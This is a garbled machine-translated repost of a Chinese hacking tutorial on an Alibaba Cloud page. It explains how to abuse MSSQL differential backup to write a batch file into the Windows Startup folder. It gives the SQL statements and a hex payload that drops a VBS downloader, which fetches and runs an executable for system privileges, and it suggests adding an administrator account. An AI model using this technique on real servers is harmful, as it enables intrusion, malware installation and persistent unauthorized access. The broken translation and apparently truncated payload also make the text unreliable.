Yesterday on the Internet to find information time inadvertently entered a station, confused went in, want to mention the right to lift, and then add the service provider's Q number would like social workers, shot a half-day to know that the security of the server is Green Union people to do the security, and then asked the pig what the right method did not, he just did this animation to send come over, Looked up the Internet to find the article, together with the copy. Recently busy learning little attention to this aspect of things, behind, behind ...
Here are the information and animations found on the Internet.
Team in the internal information for a long time, now do not put out, sooner or later someone will find out! So take it out and share it!
MSSQL differential backup acquisition Webshell Almost everyone knows, then we can use the difference back up the file as malicious code
Do you want to automatically elevate permissions or add administrators after the system has been executed? Of course you can, kj021320 test n times after the talk to you!
So we have to think about the location of the file where the system will run? This is actually a nonsense bar!
You don't have to think about it. General Place C:\Documents and Settings\All users\"Start menu \ program \ Boot
Oh, the position has! So what files do we back up to allow the system to execute?
This is the first key point ~!
EXE JS VBS Bat These files are the first time you think of them.
Those I one to analyze exe words! It's definitely going to be! But the MSSQL difference backup so much garbage will definitely break the EXE!
Veto off
And then to the script
VBS can we comment out his spam message? Otherwise the VBS will not execute! OK, all the friends who have learned VBS know
There are 2 kinds of annotations in the VBS ' and it's REM.
But there's still going to be a spam shield.
Veto off
Where's JS? JS has multiple lines of annotation/**/but/* can't be in the first line?
Veto off
Finally, we are left with the most familiar bat batch!
Ok let's continue to analyze what is the annotation in bat? Also REM, failure Ah! Before the VBS there's no such thing as REM annotations here!
So what do we do? It's actually very simple! What happens when we knock the wrong command system under CMD?
Say here if everybody does not go to the article below to see also can think of method ~
OK we continue to explore ~ ~ Here is the most critical point, the difference back up the spam information we can through the return of his submission!
And the system is only treated as a useless command! Does not affect our operation!
Is that how the problem is solved? No! ~mssql backup, to a certain length of characters will appear garbage characters, that character will affect our operation!
So we have to reduce the sentence as little as possible, the less the better ~
Okay, well, we got a good idea. Use BAT to write a VBS downloader and then execute this download to get the system permissions at the end of the download from the girl who came back down
Here's the bat that I changed to build the downloader
Next K. VBS then k.vbs download a t.exe file to save to local direct execution
Remember I said before the code must use a carriage return to the garbage data to submit the best 2 more than a carriage return
Then implement differential backups
ALTER DATABASE ISTO set RECOVERY full--
Create table cmd (a image)--
Backup LOG ISTO to disk = ' c:\cmd1 ' with init--
Insert into cmd (a) VALUES (0x130a0d0a6563686f2053657420503d6372656174654f626a65637428224d696372
6B2E7662730D0A740D0A)--
Backup LOG ISTO to disk = ' C:\Documents and Settings\All users\"Start menu \ program \ Start \1.bat '--
drop table cmd--
OK Bat's Out! As for how to let the server restart it! This question is left to you to discuss!
It would be more convenient if the server opened 3389 directly! Direct bat a command to add admin is more fun!
Isto is the tool used in animation.
Isto Auxiliary conversion tool. rar
MSSQL differential backup takes system permissions. rar
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
